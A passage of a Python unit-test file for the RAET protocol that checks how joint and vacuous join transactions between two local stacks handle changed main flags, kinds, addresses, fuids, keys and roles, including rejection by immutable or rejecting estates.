            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    console.terse("\nAllow Joint Beta and Alpha *********\n")
    self.allow(beta, alpha)
    self.allow(alpha, beta)
    # After both allows: remotes report allowed and alived True.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertTrue(remote.allowed)
            self.assertIs(remote.alived, True)
    # Cleanup: close sockets and clear persisted keeps.
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinJointVacuuousMainWithMain(self):
    '''
    Test join vacuous,initiated by main both sides with main kind set
    to True in remotes before join
    '''
    console.terse("{0}\n".format(self.testJoinJointVacuuousMainWithMain.__doc__))
    alphaData = self.createRoadData(base=self.base,
                                    name='alpha',
                                    ha=("", raeting.RAET_PORT),
                                    main=True,
                                    auto=raeting.AutoMode.once.value)
    keeping.clearAllKeep(alphaData['dirpath'])
    alpha = self.createRoadStack(data=alphaData)
    betaData = self.createRoadData(base=self.base,
                                   name='beta',
                                   ha=("", raeting.RAET_TEST_PORT),
                                   main=True,
                                   auto=raeting.AutoMode.once.value)
    keeping.clearAllKeep(betaData['dirpath'])
    beta = self.createRoadStack(data=betaData)
    console.terse("\nJoin Joint Alpha and Beta *********\n")
    self.assertIs(alpha.main, True)
    self.assertIs(alpha.keep.auto, raeting.AutoMode.once.value)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertIs(beta.main, True)
    self.assertIs(beta.keep.auto, raeting.AutoMode.once.value)
    self.assertEqual(len(beta.remotes), 0)
    console.terse("\nJoint Join Transaction **************\n")
    # As testJoinJointVacuuousMain, but each side pre-marks the remote's
    # main flag True before initiating the vacuous join.
    remote = alpha.addRemote(estating.RemoteEstate(stack=alpha,
                                                   fuid=0,  # vacuous join
                                                   sid=0,  # always 0 for join
                                                   ha=beta.local.ha,
                                                   main=True))
    alpha.join(uid=remote.uid, cascade=False, renewal=False)
    remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                  fuid=0,  # vacuous join
                                                  sid=0,  # always 0 for join
                                                  ha=alpha.local.ha,
                                                  main=True))
    beta.join(uid=remote.uid, cascade=False, renewal=False)
    self.serviceStacks([alpha, beta], duration=2.0)
    # The simultaneous joins must resolve to one joined remote per side.
    for stack in [beta, alpha]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    console.terse("\nAllow Joint Beta and Alpha *********\n")
    self.allow(beta, alpha)
    self.allow(alpha, beta)
    # After both allows: remotes report allowed and alived True.
    for stack in [beta, alpha]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertTrue(remote.allowed)
            self.assertIs(remote.alived, True)
    # Cleanup: close sockets and clear persisted keeps.
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewMain(self):
    '''
    Test immutable joinent reject vacuous join with an updated main (A1)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewMain.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    alpha, beta = self.bootstrapStacks()
    # Mutable: No
    self.assertIs(alpha.mutable, None)
    # Vacuous: Yes
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0,  # vacuous join
                                                      sid=0,  # always 0 for join
                                                      ha=alpha.local.ha))
    # Ephemeral: No Name (the name is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    oldMain = None
    newMain = True
    # Name: Old
    # Main: New -- flip beta's main so the join carries a changed main flag.
    self.assertIs(beta.main, oldMain)
    beta.main = newMain
    # Kind: Either
    # RHA: Either
    # Nuid: Computed
    # Fuid: Either
    # Leid: 0
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Ensure remote status is None
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, nack -- immutable alpha must refuse the changed main.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIs(alphaRemote.acceptance, None)
    self.assertIs(betaRemote.acceptance, None)
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert remote and role aren't dumped
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Cleanup: close sockets and clear persisted keeps.
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewKind(self):
    '''
    Test immutable joinent reject vacuous join with an updated kind (A2)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewKind.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    alpha, beta = self.bootstrapStacks()
    # Mutable: No
    self.assertIs(alpha.mutable, None)
    # Vacuous: Yes
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0,  # vacuous join
                                                      sid=0,  # always 0 for join
                                                      ha=alpha.local.ha))
    # Ephemeral: No Name (the name is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    oldKind = None
    newKind = 33
    # Name: Old
    # Main: Either
    # Kind: New -- change beta's kind so the join carries a changed kind.
    self.assertIs(beta.kind, oldKind)
    beta.kind = newKind
    # RHA: Either
    # Nuid: Computed
    # Fuid: Either
    # Leid: 0
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Ensure remote status is None
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, nack -- immutable alpha must refuse the changed kind.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert remote and role aren't dumped
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Cleanup: close sockets and clear persisted keeps.
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewRha(self):
    '''
    Test immutable joinent reject vacuous join with an updated remote host address (A3)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewRha.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    alpha, beta = self.bootstrapStacks()
    # Mutable: No (alpha.mutable is None, so any non-sameall change must be refused)
    self.assertIs(alpha.mutable, None)
    # Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
    # beta connects with ha=('127.0.0.1', 7531)
    oldHa = (beta.local.ha[0], 7532)
    newHa = (beta.local.ha[0], beta.local.ha[1])
    # Vacuous: Yes
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                fuid=0, # vacuous join
                                sid=0, # always 0 for join
                                ha=alpha.local.ha))
    # Ephemeral: No Name (the name is known)
    # alpha's pre-existing remote for beta carries the stale host address (oldHa)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=oldHa,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    # Name: Old
    # Main: Either
    # Appl: Either
    # RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
    #      new ha received from beta is (127.0.0.1, 7531)
    # Nuid: Computed
    # Fuid: Either
    # Leid: 0
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    self.assertEqual(alphaRemote.ha, oldHa)
    self.assertEqual(beta.local.ha, newHa)
    # Snapshot alpha's remote so we can prove it was left untouched
    keep = self.copyData(alphaRemote)
    # Ensure remote status is None (no acceptance/keys persisted yet)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid, duration=2.0)
    # Action: Reject, nack
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert role/keys aren't touched (remote was never dumped)
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewFuid(self):
    '''
    Test immutable joinent reject vacuous join with an updated fuid (A4)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewFuid.__doc__))
    # Setup: auto-accepting stacks; alpha stays immutable.
    alpha, beta = self.bootstrapStacks()
    self.assertIs(alpha.mutable, None)  # Mutable: No
    # Vacuous join: beta's remote for alpha carries fuid=0 and sid=0.
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0,  # vacuous join
                                                      sid=0,  # always 0 for join
                                                      ha=alpha.local.ha))
    # Alpha already knows beta but under a stale fuid (33); the incoming
    # join will instead carry beta's fresh nuid, so the estates differ.
    staleFuid = 33
    freshFuid = betaRemote.nuid
    # Not ephemeral: the name is already known to alpha.
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=staleFuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    # Fuid is the only difference => not sameall; immutable alpha rejects.
    snapshot = self.copyData(alphaRemote)
    # No acceptance or keys have been persisted for beta's role yet.
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    for field in ('acceptance', 'verhex', 'pubhex'):
        self.assertIs(roleData[field], None)
    # Run the join transaction.
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Expect: reject with a nack; nothing joined on either side.
    for stack in (alpha, beta):
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Alpha's pre-existing remote must be byte-for-byte untouched.
    self.assertTrue(self.sameAll(alphaRemote, snapshot))
    for stack, stat in ((alpha, 'joinent_transaction_failure'),
                        (beta, 'joiner_transaction_failure')):
        self.assertIn(stat, stack.stats)
        self.assertEqual(stack.stats[stat], 1)
    # Neither the remote nor its role/keys were dumped to the keep.
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    for field in ('acceptance', 'verhex', 'pubhex'):
        self.assertIs(roleData[field], None)
    for stack in (alpha, beta):
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewKeys(self):
    '''
    Test immutable joinent reject vacuous join with an updated keys (A5)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewKeys.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    alpha, beta = self.bootstrapStacks()
    # Mutable: No
    self.assertIs(alpha.mutable, None)
    # Vacuous: Yes
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                fuid=0, # vacuous join
                                sid=0, # always 0 for join
                                ha=alpha.local.ha))
    # Ephemeral: No Name (the name is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    # Name: Old
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Computed
    # Fuid: Either
    # Leid: 0
    # Reid: Either
    # Role: Old
    # Keys: New (beta regenerates both key pairs below)
    beta.local.signer = nacling.Signer()
    beta.local.priver = nacling.Privateer()
    beta.dumpLocalRole()
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Ensure remote status is None
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, nack
    # NOTE(review): this comment previously read "Accept, Dump", which
    # contradicts the assertions below (transaction failure on both sides,
    # remote never dumped) — the immutable joinent rejects the new keys.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert role/keys aren't touched
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewRole(self):
    '''
    Test immutable joinent reject vacuous join with an updated role (A6)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewRole.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    alpha, beta = self.bootstrapStacks()
    # Mutable: No
    self.assertIs(alpha.mutable, None)
    # Vacuous: Yes
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                fuid=0, # vacuous join
                                sid=0, # always 0 for join
                                ha=alpha.local.ha))
    # Ephemeral: No Name (the name is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    oldRole = 'beta'
    newRole = 'beta_new'
    # Name: Old
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Computed
    # Fuid: Either
    # Leid: 0
    # Reid: Either
    # Role: New
    # FIX: use assertEqual, not assertIs — identity comparison of two str
    # objects only passes when CPython happens to intern them, which is an
    # implementation detail, not a guarantee. Equality is what is meant.
    self.assertEqual(beta.local.role, oldRole)
    beta.local.role = newRole
    beta.dumpLocalRole()
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Ensure remote status is None for both the old and the new role
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], newRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, nack (role changed but alpha is immutable)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert role/keys aren't touched (nothing persisted for either role)
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectNewKeys(self):
    '''
    Test joinent rejects vacuous join request with new keys from already rejected estate (B1)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectNewKeys.__doc__))
    # Setup: no auto-accept of keys; alpha is mutable.
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    alpha.mutable = True  # Mutable: Yes
    # Vacuous join: beta's remote for alpha carries fuid=0 and sid=0.
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0,  # vacuous join
                                                      sid=0,  # always 0 for join
                                                      ha=alpha.local.ha))
    # Not ephemeral: alpha already knows beta by name with its current keys.
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    # Mark beta's role as rejected in alpha's keep.
    alpha.keep.rejectRemote(alphaRemote)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Beta regenerates both key pairs: same role, new keys => not sameall.
    beta.local.signer = nacling.Signer()
    beta.local.priver = nacling.Privateer()
    beta.dumpLocalRole()
    snapshot = self.copyData(alphaRemote)
    # Attempt the join with the new keys.
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Expect: reject; alpha keeps its existing remote untouched.
    for stack in (alpha, beta):
        self.assertEqual(len(stack.transactions), 0)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # The in-memory remote on alpha is unchanged.
    self.assertTrue(self.sameAll(alphaRemote, snapshot))
    for stack, stat in ((alpha, 'joinent_transaction_failure'),
                        (beta, 'joiner_transaction_failure')):
        self.assertIn(stat, stack.stats)
        self.assertEqual(stack.stats[stat], 1)
    # No remote data was dumped for beta.
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # The persisted role still holds the old (rejected) keys.
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    for stack in (alpha, beta):
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectNewRole(self):
    '''
    Test joinent rejects vacuous join request with new role from already rejected estate (B2)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectNewRole.__doc__))
    # Mode: Never
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: Yes
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                fuid=0, # vacuous join
                                sid=0, # always 0 for join
                                ha=alpha.local.ha))
    # Ephemeral: No Name (the name is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    # Status: Rejected
    alpha.keep.rejectRemote(alphaRemote)
    # Ensure remote role is rejected
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    oldRole = 'beta'
    newRole = 'beta_new'
    # Name: Old
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Computed
    # Fuid: Either
    # Leid: 0
    # Reid: Either
    # Role: New (beta switches to a role alpha has no status for)
    self.assertIs(beta.local.role, oldRole)
    beta.local.role = newRole
    beta.dumpLocalRole()
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Join with a new role
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Pend, dump — the unknown new role leaves one transaction
    # pending on each side and the new role persisted as 'pending'
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # alphaRemote picked up the new role, so neither sameAll nor
    # sameRoleKeys holds against the pre-join snapshot
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.role, newRole)
    self.assertIn('joiner_rx_pend', beta.stats)
    self.assertEqual(beta.stats['joiner_rx_pend'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump: old role stays rejected, new role is pending
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    # Reject the new role and let the pending transactions run to completion
    alpha.keep.rejectRemote(alphaRemote)
    self.serviceStacks([alpha, beta])
    # Action: Reject — alpha drops its remote (and its keep dump), while
    # the persisted role data for both roles is kept as 'rejected'
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertEqual(len(alpha.nameRemotes), 0)
    self.assertEqual(len(beta.remotes), 1)
    self.assertEqual(len(beta.nameRemotes), 1)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.role, newRole)
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
